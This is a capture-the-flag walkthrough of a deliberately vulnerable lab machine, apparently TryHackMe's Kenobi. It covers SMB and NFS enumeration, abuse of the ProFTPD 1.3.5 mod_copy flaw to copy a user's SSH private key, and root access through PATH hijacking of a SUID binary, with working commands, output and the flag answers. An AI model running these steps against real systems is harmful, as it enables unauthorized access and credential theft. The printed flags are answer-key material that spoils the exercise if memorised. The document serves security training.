[Deploy the vulnerable machine]

[*] Target: 10.10.251.198

[Question 1] Scan the machine with nmap, how many ports are open? => 7

    # nmap -T5 10.10.251.198                                             

        Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-07 04:10 EDT

        Not shown: 65524 closed tcp ports (reset)
        PORT      STATE SERVICE
        21/tcp    open  ftp
        22/tcp    open  ssh
        80/tcp    open  http
        111/tcp   open  rpcbind
        139/tcp   open  netbios-ssn
        445/tcp   open  microsoft-ds
        2049/tcp  open  nfs

        Nmap done: 1 IP address (1 host up) scanned in 252.13 seconds


************************************************************************************************************************************************************************************************************************************************************


[Enumerating Samba for shares]

[*] Target: 10.10.251.198

[Question 1] How many shares have been found in the SMB service? => 3

    # nmap -p 445,139 --script=smb-enum-shares.nse 10.10.251.198 -v 

        PORT    STATE SERVICE
        139/tcp open  netbios-ssn
        445/tcp open  microsoft-ds

        Host script results:
        | smb-enum-shares: 
        |   account_used: guest
        |   \\10.10.251.198\IPC$: 
        |     Type: STYPE_IPC_HIDDEN
        |     Comment: IPC Service (kenobi server (Samba, Ubuntu))
        |     Users: 1
        |     Max Users: <unlimited>
        |     Path: C:\tmp
        |     Anonymous access: READ/WRITE
        |     Current user access: READ/WRITE
        |   \\10.10.251.198\anonymous: 
        |     Type: STYPE_DISKTREE
        |     Comment: 
        |     Users: 0
        |     Max Users: <unlimited>
        |     Path: C:\home\kenobi\share
        |     Anonymous access: READ/WRITE
        |     Current user access: READ/WRITE
        |   \\10.10.251.198\print$: 
        |     Type: STYPE_DISKTREE
        |     Comment: Printer Drivers
        |     Users: 0
        |     Max Users: <unlimited>
        |     Path: C:\var\lib\samba\printers
        |     Anonymous access: <none>
        |_    Current user access: <none

[Question 2] Once you're connected to the /anonymous, list the files on the share. What is the file can you see? => log.txt

    # smbclient //10.10.251.198/anonymous
        
        Password for [WORKGROUP\root]: <Enter "anonymous">
        Try "help" to get a list of possible commands.
        
        smb: \> ls
        .                                   D        0  Wed Sep  4 06:49:09 2019
        ..                                  D        0  Wed Sep  4 06:56:07 2019
        log.txt                             N    12237  Wed Sep  4 06:49:09 2019

                        9204224 blocks of size 1024. 6877116 blocks available
    smb: \> get log.txt
        getting file \log.txt of size 12237 as log.txt (11.3 KiloBytes/sec) (average 11.3 KiloBytes/sec)

[Question 3] What port is FTP running on? => 21

[Question 4] What mount can we see in the rpcbind service? => /var

    [?] In the NFS (Network File System), "mount" specifically refers to the process of accessing remote file systems over a network and making them appear as if they were local file systems

    [?] By using rpcbind, client programs do not need to know the exact port numbers of the services they want to access. 
        Instead, they can rely on the rpcbind service to handle the mapping between service names and port numbers dynamically.

        # nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.251.198

        [?] nfs-ls: This operation lists the contents (files and directories) of an NFS-mounted directory.

        [?] nfs-statfs: This operation retrieves file system information for an NFS-mounted directory (like size of the file system, the amount of free space ...)

        [?] nfs-showmount: This operation displays a list of remote NFS servers and the directories they have exported (made available) for mounting

        Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-07 04:48 EDT
        Nmap scan report for 10.10.251.198
        Host is up (0.22s latency).

        PORT    STATE SERVICE
        111/tcp open  rpcbind
        | nfs-showmount: 
        |_  /var *
        | nfs-ls: Volume /var
        |   access: Read Lookup NoModify NoExtend NoDelete NoExecute
        | PERMISSION  UID  GID  SIZE  TIME                 FILENAME
        | rwxr-xr-x   0    0    4096  2019-09-04T08:53:24  .
        | rwxr-xr-x   0    0    4096  2019-09-04T12:27:33  ..
        | rwxr-xr-x   0    0    4096  2019-09-04T12:09:49  backups
        | rwxr-xr-x   0    0    4096  2019-09-04T10:37:44  cache
        | rwxrwxrwx   0    0    4096  2019-09-04T08:43:56  crash
        | rwxrwsr-x   0    50   4096  2016-04-12T20:14:23  local
        | rwxrwxrwx   0    0    9     2019-09-04T08:41:33  lock
        | rwxrwxr-x   0    108  4096  2019-09-04T10:37:44  log
        | rwxr-xr-x   0    0    4096  2019-01-29T23:27:41  snap
        | rwxr-xr-x   0    0    4096  2019-09-04T08:53:24  www
        |_
        | nfs-statfs: 
        |   Filesystem  1K-blocks  Used       Available  Use%  Maxfilesize  Maxlink
        |_  /var        9204224.0  1836516.0  6877112.0  22%   16.0T        32000


************************************************************************************************************************************************************************************************************************************************************


[Gain initial access with ProFtpd]

[*] Target: 10.10.251.198

[?] ProFtpd is a free and open-source FTP server, compatible with Unix and Windows systems. Its also been vulnerable in the past software versions.

[Question 1] What is the version? => 1.3.5

    # nmap -p 21 -sV -A 10.10.251.198

        ...
        PORT   STATE SERVICE VERSION
        21/tcp open  ftp     ProFTPD 1.3.5
        ...
        Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
        Aggressive OS guesses: Linux 3.10 - 3.13 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%)

[Question 2] How many exploits are there for the ProFTPd running? => 4

    # searchsploit proftpd 1.3.5

        ---------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
        Exploit Title                                                                                                                                      |  Path
        ---------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
        ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit)                                                                                           | linux/remote/37262.rb
        ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution                                                                                                 | linux/remote/36803.py
        ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2)                                                                                             | linux/remote/49908.py
        ProFTPd 1.3.5 - File Copy                                                                                                                           | linux/remote/36742.txt
        -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
        Shellcodes: No Results
        Papers: No Results

        [?] The mod_copy module implements SITE CPFR and SITE CPTO commands (which can be used to copy files/directories from one place to another on the server)
                
                [>>] Any unauthenticated client can leverage these commands to copy files from any part of the filesystem to a chosen destination.

[Question 3] What is Kenobi's user flag (/home/kenobi/user.txt)? => d0b0f3f53b6caa532a83915e19224899

    [Note] We know that the FTP service is running as the Kenobi user (from the file on the share) and an ssh key is generated for that user. 

    # nc 10.10.251.198 21

        220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.251.198]

        SITE CPFR /home/kenobi/.ssh/id_rsa

            [?] "SITE CPFR" command is used to specify the file or directory on the server that you want to copy from

        350 File or directory exists, ready for destination name

        SITE CPTO /var/tmp/id_rsa
        
            [?] "SITE CPTO" command is used to specify the destination file or directory where the file should be copied to

        250 Copy successful

    # sudo mount 10.10.251.198:/var/tmp /home/omnissiah/Desktop

    # ls -al /home/omnissiah/Desktop

        drwxrwxrwt  6 root      root      4096 Jul  7 05:37 .
        drwx------ 31 omnissiah omnissiah 4096 Jul  7 06:08 ..
        -rw-r--r--  1 omnissiah omnissiah 1675 Jul  7 05:52 id_rsa
        drwx------  3 root      root      4096 Sep  4  2019 systemd-private-2408059707bc41329243d2fc9e613f1e-systemd-timesyncd.service-a5PktM
        drwx------  3 root      root      4096 Jul  7 03:48 systemd-private-4d5e47182ae547a4907165d4fbfd5d26-systemd-timesyncd.service-FTuBZg
        drwx------  3 root      root      4096 Sep  4  2019 systemd-private-6f4acd341c0b40569c92cee906c3edc9-systemd-timesyncd.service-z5o4Aw
        drwx------  3 root      root      4096 Sep  4  2019 systemd-private-e69bbb0653ce4ee3bd9ae0d93d2a5806-systemd-timesyncd.service-zObUdn

    # chmod 600 id_rsa

    # ssh -i id_rsa kenobi@10.10.251.198

        kenobi@kenobi:~$ cat /home/kenobi/user.txt
        d0b0f3f53b6caa532a83915e19224899


************************************************************************************************************************************************************************************************************************************************************


[Privilege Escalation with Path Variable Manipulation]

[*] Target: 10.10.251.198

[Question 1] What file looks particularly out of the ordinary? => /usr/bin/menu

    kenobi@kenobi:~$ find / -perm -u=s -type f 2>/dev/null

        /sbin/mount.nfs
        /usr/lib/policykit-1/polkit-agent-helper-1
        /usr/lib/dbus-1.0/dbus-daemon-launch-helper
        /usr/lib/snapd/snap-confine
        /usr/lib/eject/dmcrypt-get-device
        /usr/lib/openssh/ssh-keysign
        /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
        /usr/bin/chfn
        /usr/bin/newgidmap
        /usr/bin/pkexec
        /usr/bin/passwd
        /usr/bin/newuidmap
        /usr/bin/gpasswd
        /usr/bin/menu
        /usr/bin/sudo
        /usr/bin/chsh
        /usr/bin/at
        /usr/bin/newgrp
        /bin/umount
        /bin/fusermount
        /bin/mount
        /bin/ping
        /bin/su
        /bin/ping6

[Question 3] Run the binary, how many options appear? => 3

    kenobi@kenobi:/usr/bin$ menu

    ***************************************
    1. status check
    2. kernel version
    3. ifconfig
    ** Enter your choice :

[Question 4] What is the root flag (/root/root.txt)? => 177b3cd8562289f37382721c28381f02

    kenobi@kenobi:/tmp$ strings /usr/bin/menu

        ...
        **************************
        1. status check
        2. kernel version
        3. ifconfig
        ** Enter your choice :
        curl -I localhost
        uname -r
        ifconfig
        ...

    => This shows us the binary is running without a full path (e.g. not using /usr/bin/curl or /usr/bin/uname).

    kenobi@kenobi:/tmp$ env
        ...
        PATH=/home/kenobi/bin:/home/kenobi/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
        ...

    [***]  When you export the PATH variable to include "/tmp" before the existing PATH, it can impact the resolution of command execution

        [>>]  When you run "uname -r" after exporting the modified PATH
              it will first search for the "uname" command in the "/tmp" directory before searching in the original directories listed in the PATH variable

    kenobi@kenobi:/tmp$ echo /bin/bash > ifconfig

    kenobi@kenobi:/tmp$ chmod 777 ifconfig

    kenobi@kenobi:/tmp$ export PATH=/tmp:$PATH

    kenobi@kenobi:/tmp$ env 
        ...
        PATH=/tmp:/home/kenobi/bin:/home/kenobi/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
        ... 

    kenobi@kenobi:/tmp$ /usr/bin/menu

        ***************************************
        1. status check
        2. kernel version
        3. ifconfig
        ** Enter your choice :3
        # cat /root/root.txt
        177b3cd8562289f37382721c28381f02
        # cat /usr/share/ifconfig
        cat: /usr/share/ifconfig: No such file or directory

    => As you can see /usr/share/ifconfig doesn't exist =))
